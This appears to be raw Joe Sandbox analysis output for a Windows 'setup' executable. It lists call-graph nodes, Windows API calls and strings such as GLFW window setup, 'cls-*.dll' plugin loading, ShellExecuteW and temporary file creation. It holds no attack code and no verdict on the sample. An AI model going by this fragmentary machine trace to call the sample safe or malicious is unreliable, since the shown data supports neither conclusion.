110487->110489 110493 247650 3 API calls 110488->110493 110561 249ec0 EnumDisplaySettingsExW 110489->110561 110495 24cfdd 110493->110495 110494 24cc2c 110565 2471e0 MultiByteToWideChar 110494->110565 110496 24cfe5 110495->110496 110497 24d300 AdjustWindowRectEx 110495->110497 110496->109975 110502 24d329 AdjustWindowRectEx 110497->110502 110500 24cc4f GetModuleHandleW CreateWindowExW free 110503 24cf35 110500->110503 110504 24cce3 SetPropW 110500->110504 110501 24cf49 110501->109975 110619 2470e0 11 API calls 110503->110619 110573 247570 VerSetConditionMask VerSetConditionMask VerSetConditionMask 110504->110573 110507 24d0e0 110511 24d105 ClientToScreen ClientToScreen 110507->110511 110512 24d290 MonitorFromWindow 110507->110512 110508 24cdb3 DragAcceptFiles 110509 24cdd5 110508->110509 110510 24cde0 110508->110510 110617 24ab10 12 API calls 110509->110617 110515 24ce1b 110510->110515 110520 24ce05 110510->110520 110521 24d1d0 110510->110521 110516 247650 3 API calls 110511->110516 110625 249db0 7 API calls 110512->110625 110517 24cf25 110515->110517 110518 24ce26 ShowWindow BringWindowToTop SetForegroundWindow SetFocus 110515->110518 110522 24d13d 110516->110522 110517->109975 110523 24ce84 110518->110523 110524 24d050 SetThreadExecutionState 110518->110524 110519 24d2bc 110519->109975 110526 24d210 110520->110526 110527 24ce10 110520->110527 110575 250410 110521->110575 110522->110502 110528 24d145 SetWindowPos 110522->110528 110523->110524 110529 24ce92 110523->110529 110542 24d084 SystemParametersInfoW SystemParametersInfoW 110523->110542 110532 247570 3 API calls 110524->110532 110621 251eb0 29 API calls 110526->110621 110527->110515 110534 24d250 110527->110534 110528->109975 110618 249b70 17 API calls 110529->110618 110531 24d1d5 110531->110501 110537 24d1dd 110531->110537 110532->110523 110623 252f60 17 API calls 110534->110623 110620 250b80 22 API calls 110537->110620 110538 24d215 110538->110501 110622 252360 15 API calls 110538->110622 110539 24d255 110539->110501 110624 253160 8 API calls 110539->110624 110540 24cea5 110547 24ceb4 GetMonitorInfoW SetWindowPos 110540->110547 110542->110523 110544 24d1fb 110544->110515 110548 24d203 110544->110548 110547->110517 110548->110501 110549->109986 110550->109996 110551->110003 110552->109991 110553->109997 110554->109993 110555->109960 110556->109960 110557->109974 110558->110004 110559->109977 110560->110002 110562 249f1e 110561->110562 110563 24a370 EnumDisplaySettingsW 110562->110563 110564 24a3fb 110563->110564 110564->110494 110566 247225 calloc MultiByteToWideChar 110565->110566 110567 247270 110565->110567 110569 247290 110566->110569 110570 247265 110566->110570 110626 2470e0 11 API calls 110567->110626 110627 2470e0 11 API calls 110569->110627 110570->110500 110570->110501 110572 2472a4 free 110572->110570 110574 247633 110573->110574 110574->110507 110574->110508 110576 250421 LoadLibraryA 110575->110576 110577 25041f 110575->110577 110578 250445 8 API calls 110576->110578 110579 250920 110576->110579 110577->110531 110581 250513 110578->110581 110640 2470e0 11 API calls 110579->110640 110581->110581 110582 25051f ChoosePixelFormat SetPixelFormat 110581->110582 110583 2509e7 110582->110583 110587 250564 110582->110587 110641 2470e0 11 API calls 110583->110641 110585 250b0e 110602 250970 110585->110602 110643 2470e0 11 API calls 110585->110643 110587->110585 110588 250a02 110587->110588 110591 2505a2 110587->110591 110642 2470e0 11 API calls 110588->110642 110590 250934 110590->110531 110596 25087c 110591->110596 110597 2508f0 110591->110597 110628 23e480 strstr strlen 110591->110628 110593 250645 110593->110596 110593->110597 110629 23e480 strstr strlen 110593->110629 110595 250684 110595->110596 110595->110597 110630 23e480 strstr strlen 110595->110630 110596->110585 110596->110597 110598 2508ce 110596->110598 110638 23e480 strstr strlen 110596->110638 110597->110531 110598->110597 110639 23e480 strstr strlen 110598->110639 110600 2506c3 110600->110596 110600->110597 110631 23e480 strstr strlen 110600->110631 110602->110531 110605 250702 110605->110596 110605->110597 110632 23e480 strstr strlen 110605->110632 110607 250741 110607->110596 110607->110597 110633 23e480 strstr strlen 110607->110633 110609 250780 110609->110596 110609->110597 110634 23e480 strstr strlen 110609->110634 110611 2507bf 110611->110596 110611->110597 110635 23e480 strstr strlen 110611->110635 110613 2507fe 110613->110585 110613->110602 110636 23e480 strstr strlen 110613->110636 110615 25083d 110615->110596 110637 23e480 strstr strlen 110615->110637 110617->110510 110618->110540 110619->110501 110620->110544 110621->110538 110622->110544 110623->110539 110624->110544 110625->110519 110626->110570 110627->110572 110628->110593 110629->110595 110630->110600 110631->110605 110632->110607 110633->110609 110634->110611 110635->110613 110636->110615 110637->110596 110638->110596 110639->110597 110640->110590 110641->110590 110642->110590 110643->110590 110644 24c4a7 110645 24c4b0 110644->110645 110646 24b0c2 DefWindowProcW 110645->110646 110647 24b0e8 110645->110647 110646->110647 110648 1c5cb8 110649 1c5cc0 MessageBoxW 110648->110649 110650 1c5ca2 ReleaseMutex 110649->110650 110651 1c19d4 110652 1c19d8 malloc 110651->110652 110653 1c19ec memcpy 110652->110653 110654 1c19cc 110652->110654 110655 1c51c0 110656 1c51ce CloseHandle 110655->110656 110657 1c51da 110655->110657 110656->110657 110666 1c4d30 110657->110666 110659 1c5298 MessageBoxW 110661 1c4d30 7 API calls 110662 1c522b 110661->110662 110662->110659 110663 1c4d30 7 API calls 110662->110663 110664 1c5255 110663->110664 110664->110659 110665 1c5259 CreateThread 110664->110665 110669 1c4d60 PathFileExistsW 110665->110669 110667 2661d0 7 API calls 110666->110667 110668 1c4d57 110667->110668 110668->110659 110668->110661 110670 1c4d88 SHCreateDirectory 110669->110670 110671 1c4ee0 110669->110671 110673 1c4ea8 GetLastError 110670->110673 110674 1c4daa GetFullPathNameW 110670->110674 110716 1c27a0 8 API calls 110671->110716 110678 1c4eb5 110673->110678 110679 1c4f30 GetTempFileNameW CreateFileW 110673->110679 110676 1c4f08 110674->110676 110677 1c4dd6 110674->110677 110675 1c4eec 110717 1c27a0 8 API calls 110676->110717 110680 1c4d30 7 API calls 110677->110680 110715 1c27a0 8 API calls 110678->110715 110682 1c4f98 CloseHandle MessageBoxW 110679->110682 110683 1c4fe0 110679->110683 110685 1c4df2 110680->110685 110682->110674 110687 1c4fd5 110682->110687 110718 1c2680 FormatMessageW 110683->110718 110690 1c4dfa 110685->110690 110691 1c5030 MessageBoxW 110685->110691 110686 1c4f14 110687->110686 110688 1c4ec1 110712 1c24f0 GetDiskFreeSpaceExW 110690->110712 110691->110675 110694 1c4e02 110695 1c4e14 110694->110695 110696 1c5010 110694->110696 110713 210260 735 API calls 110695->110713 110724 1c27a0 8 API calls 110696->110724 110699 1c4e34 110700 1c4e3e 110699->110700 110701 1c50d8 110699->110701 110703 1c4e4c 110700->110703 110704 1c50b0 110700->110704 110725 1c27a0 8 API calls 110701->110725 110714 210260 735 API calls 110703->110714 110705 1c2680 7 API calls 110704->110705 110710 1c4e95 110705->110710 110707 1c4e6b 110708 1c4d30 7 API calls 110707->110708 110709 1c4e8d 110708->110709 110709->110710 110711 1c5070 ShellExecuteW 110709->110711 110710->110675 110712->110694 110713->110699 110714->110707 110715->110688 110716->110675 110717->110686 110719 1c26d5 110718->110719 110720 1c26e0 FormatMessageW LocalFree 110718->110720 110720->110719 110721 1c2734 malloc 110720->110721 110722 1c274a memcpy 110721->110722 110723 1c2764 LocalFree MessageBoxW 110721->110723 110722->110723 110724->110675 110725->110710 110726 24d429 110727 24d430 SetThreadExecutionState 110726->110727 110728 247570 3 API calls 110727->110728 110729 24d45c 110728->110729 110730 24d465 SystemParametersInfoW 110729->110730 110731 24d409 110729->110731 110730->110731 110740 249d60 110731->110740 110734 24d3b9 110736 24d3c3 DestroyIcon 110734->110736 110737 24d3cf 110734->110737 110735 24d389 RemovePropW DestroyWindow 110735->110734 110736->110737 110738 24d3e5 110737->110738 110739 24d3d9 DestroyIcon 110737->110739 110739->110738 110741 249d72 ChangeDisplaySettingsExW 110740->110741 110742 249dab 110740->110742 110741->110742 110742->110734 110742->110735 110743 248e39 110747 248aed 110743->110747 110744 248cf7 110745 248d33 110744->110745 110749 248e62 110744->110749 110746 248c71 sprintf 110746->110747 110748 248ed0 110746->110748 110747->110744 110747->110746 110747->110748 110753 248ca1 110747->110753 110755 23f1d0 8 API calls 110749->110755 110751 248e76 110753->110747 110754 240030 16 API calls 110753->110754 110754->110753 110755->110751 110756 1c13d1 110765 1c11ea 110756->110765 110757 1c1405 _initterm 110758 1c1440 GetStartupInfoA 110757->110758 110757->110765 110759 1c1470 _initterm 110761 1c1493 110759->110761 110763 1c1267 __p__acmdln 110763->110765 110764 1c12eb malloc 110764->110761 110764->110765 110765->110757 110765->110759 110765->110763 110765->110764 110766 1c1320 strlen malloc memcpy 110765->110766 110768 25c830 110765->110768 110783 25c4a0 110765->110783 110766->110765 110766->110766 110770 25c850 110768->110770 110782 1c1241 SetUnhandledExceptionFilter 110768->110782 110769 25c9f0 110772 25ca01 110769->110772 110769->110782 110770->110769 110771 25ca8f 110770->110771 110780 25c9bd 110770->110780 110781 25c8dd 110770->110781 110770->110782 110790 25c670 11 API calls 110771->110790 110776 25ca31 110772->110776 110789 25c6d0 11 API calls 110772->110789 110775 25caa9 110776->110780 110777 25c6d0 11 API calls 110777->110781 110779 25ca62 VirtualProtect 110779->110780 110780->110779 110780->110782 110781->110770 110781->110777 110781->110780 110788 25c670 11 API calls 110781->110788 110782->110765 110784 25c4a9 110783->110784 110786 25c440 110783->110786 110784->110765 110791 1c14d0 _onexit 110786->110791 110787 25c470 110787->110765 110788->110781 110789->110772 110790->110775 110791->110787 110792 1ed590 110795 1ed5b3 110792->110795 110793 1ed606 110794 1ed5f3 CoUninitialize 110794->110793 110795->110793 110795->110794 110796 1e6b10 110797 1e6b1e CloseHandle 110796->110797 110798 1e6b2a CreateThread 110796->110798 110797->110798 110799 1e69a0 110798->110799 110800 1e69ac 110799->110800 110800->110800 110801 1e69b8 CoInitializeEx 110800->110801 110802 1e69dd MessageBoxW 110801->110802 110803 1e6a28 SHBrowseForFolderW 110801->110803 110806 1e6a16 110802->110806 110804 1e6a3e SHGetPathFromIDListW 110803->110804 110805 1e6a80 110803->110805 110807 1e6a5f CoTaskMemFree 110804->110807 110808 1e6a6b CoUninitialize 110805->110808 110807->110808 110809 1ed280 VirtualQuery 110810 1ed2ca 110809->110810 110811 1ed2d8 GetModuleFileNameW wcsrchr wcscpy FindFirstFileW 110810->110811 110812 1ed455 110811->110812 110816 1ed33c 110811->110816 110813 1ed348 wcscpy LoadLibraryW GetProcAddress 110814 1ed435 FindNextFileW 110813->110814 110813->110816 110814->110812 110814->110813 110815 1ed3a1 wcsrchr _wcslwr 110815->110816 110816->110813 110816->110815 110817 32dda0 232 API calls 110816->110817 110818 1ed3dc strcpy 110817->110818 110821 1f12c0 26 API calls 110818->110821 110820 1ed421 110820->110814 110821->110820
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Monitor$CursorFromInfoProcPropShowcallocfree
                                                                                                    • String ID: ($,$GLFW$Win32: Failed to retrieve raw input data
                                                                                                    • API String ID: 3569294516-1653677416
                                                                                                    • Opcode ID: 372fc3d9c29e7137b94276bee81265dc1b84b009ebc4c0ebcdca0e76273b3b27
                                                                                                    • Instruction ID: 3203eee5046fb8403d886ca6ff1c1cb2e20ab2726a333e5d9b3481b9f7cdfeeb
                                                                                                    • Opcode Fuzzy Hash: 372fc3d9c29e7137b94276bee81265dc1b84b009ebc4c0ebcdca0e76273b3b27
                                                                                                    • Instruction Fuzzy Hash: 1AE235706287418FD769EF29C58872EBBE0BF84305F11892EE8D987251D7B5D898CF42

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 384 247720-24778e SystemParametersInfoW * 2 LoadLibraryA 385 247794-2477c2 GetProcAddress LoadLibraryA 384->385 386 247d1e-247d3d call 2470e0 384->386 388 247d3e-247d5d call 2470e0 385->388 389 2477c8-247872 GetProcAddress * 6 LoadLibraryA 385->389 392 247874-247884 GetProcAddress 389->392 393 247889-2478c2 389->393 392->393 395 2478ce-2478dd LoadLibraryA 393->395 396 2478c4-2478cc 395->396 397 2478df-247909 GetProcAddress * 2 395->397 396->395 398 24790e-247921 LoadLibraryA 396->398 397->398 399 247923-247967 GetProcAddress * 3 398->399 400 24796c-24797f LoadLibraryA 398->400 399->400 401 2479b0-2479c3 LoadLibraryA 400->401 402 247981-2479ab GetProcAddress * 2 400->402 403 2479c5-2479d5 GetProcAddress 401->403 404 2479da-247cb7 401->404 402->401 403->404 405 247cc1-247ccc 404->405 406 247cd6-247cde 405->406 407 247cce 405->407 406->405 408 247ce0-247cf3 call 2473a0 call 247650 406->408 407->406 413 247ef4-247f12 call 247570 408->413 414 247cf9-247d06 408->414 419 247f14-247f24 413->419 420 247f29-247f47 call 247570 413->420 418 247d09-247d12 call 24ca70 414->418 426 247d14-247d1d 418->426 427 247d5e-247dd9 GetModuleHandleW CreateWindowExW 418->427 419->418 420->418 428 247f4d-247f53 420->428 429 247ddf-247df5 ShowWindow 427->429 430 247edb-247eef call 2470e0 427->430 428->418 433 247df7-247e01 429->433 430->413 433->433 435 247e03-247e74 RegisterDeviceNotificationW 433->435 436 247e90-247ebb PeekMessageW 435->436 437 247e80-247e8d TranslateMessage DispatchMessageW 436->437 438 247ebd-247ec7 call 24a680 call 248f00 436->438 437->436 442 247ecc-247eda call 249900 438->442
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$InfoParametersSystemWindow$CreateDeviceHandleMessageModuleNotificationPeekRegisterShow
                                                                                                    • String ID: $0$AdjustWindowRectExForDpi$ChangeWindowMessageFilterEx$DirectInput8Create$DwmEnableBlurBehindWindow$DwmFlush$DwmIsCompositionEnabled$EnableNonClientDpiScaling$GLFW message window$GLFW30$GetDpiForMonitor$GetDpiForWindow$RtlVerifyVersionInfo$SetProcessDPIAware$SetProcessDpiAwareness$SetProcessDpiAwarenessContext$Win32: Failed to create helper window$Win32: Failed to load user32.dll$Win32: Failed to load winmm.dll$XInputGetCapabilities$XInputGetState$dinput8.dll$dwmapi.dll$ntdll.dll$shcore.dll$timeGetTime$user32.dll$winmm.dll$xinput1_1.dll$xinput1_2.dll$xinput1_3.dll$xinput1_4.dll$xinput9_1_0.dll
                                                                                                    • API String ID: 1697840400-299747978
                                                                                                    • Opcode ID: 69cb3f7d93d747dc99edea104badf857c3898db54688417a061fabe7e2b0d3c2
                                                                                                    • Instruction ID: 98308910dacc17a99d6587ecc6fd40a47c43350ecdc6ae5568db39cdba42b63c
                                                                                                    • Opcode Fuzzy Hash: 69cb3f7d93d747dc99edea104badf857c3898db54688417a061fabe7e2b0d3c2
                                                                                                    • Instruction Fuzzy Hash: 1B1218B85293008FD704AF68E94831A7BF0FB46309F41893DE5988B361E7B5845DCF9A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Filemalloc$Findwcscpywcsrchr$AddressFirstLibraryLoadModuleNameNextProcQueryVirtual_wcslwrexitstrcpy
                                                                                                    • String ID: ClsMain$\$cls-*.dll
                                                                                                    • API String ID: 591050770-1343641317
                                                                                                    • Opcode ID: 2d79153335678c41f6c733d44caf82ffaa8b1100db2b745e41b0abc427fd3b46
                                                                                                    • Instruction ID: 397cacfb185fef84c5c49dd08083b8789e4a8f08d494e542aeeedb32f0eb32ff
                                                                                                    • Opcode Fuzzy Hash: 2d79153335678c41f6c733d44caf82ffaa8b1100db2b745e41b0abc427fd3b46
                                                                                                    • Instruction Fuzzy Hash: AD51E5B0508B009FC301EF68E58966EBBF0BF85705F41892EE4C88B351EB749949DF96

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 928 1c11b3-1c11b7 929 1c11b8-1c11ba 928->929 930 1c11cc-1c11d8 929->930 931 1c13d8-1c13e5 929->931 930->929 932 1c11ea-1c11f1 930->932 931->932 933 1c1405-1c1425 _initterm 931->933 936 1c11f7-1c1209 932->936 937 1c1470-1c1489 _initterm 932->937 934 1c1217-1c127c call 25c830 SetUnhandledExceptionFilter call 2744a0 call 25c660 __p__acmdln 933->934 935 1c1440-1c144c GetStartupInfoA 933->935 946 1c1280-1c1282 934->946 947 1c1291-1c1297 934->947 936->933 936->934 940 1c1493 937->940 946->947 948 1c12c8-1c130b malloc 946->948 947->946 947->948 948->940 951 1c1311-1c131d 948->951 952 1c1320-1c1354 strlen malloc memcpy 951->952 952->952 953 1c1356-1c1391 call 25c4a0 call 3328c0 952->953 953->931
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _inittermmalloc$ExceptionFilterUnhandled__p__acmdln_amsg_exitmemcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 760028103-0
                                                                                                    • Opcode ID: bddf76bc13a3bc2046d613869e5a3c53c40c2156a9ede4f9e04586e8521779c5
                                                                                                    • Instruction ID: b620399b2eb1e4dc515bb17b4576f2ba1e95ec30f867a3f92ff6e8b02599917c
                                                                                                    • Opcode Fuzzy Hash: bddf76bc13a3bc2046d613869e5a3c53c40c2156a9ede4f9e04586e8521779c5
                                                                                                    • Instruction Fuzzy Hash: 7B5149B4A04301DFDB10EFA4E985B9EBBE0BF5A305F11842DD9889B212E734D955CF86
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoStartup
                                                                                                    • String ID:
                                                                                                    • API String ID: 2571198056-0
                                                                                                    • Opcode ID: efb79b3df0522b5f892ada757222440a4c2624e32499d837deeb72f49df38ed4
                                                                                                    • Instruction ID: f1139b11eca607ca601b9a4f8a053c387017546c209e2af8a5e3045768da0277
                                                                                                    • Opcode Fuzzy Hash: efb79b3df0522b5f892ada757222440a4c2624e32499d837deeb72f49df38ed4
                                                                                                    • Instruction Fuzzy Hash: 5A518AB5A04300DFD710EFA8D981B9ABBE0BB9A705F61842DE9849B313D734D944CF86

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
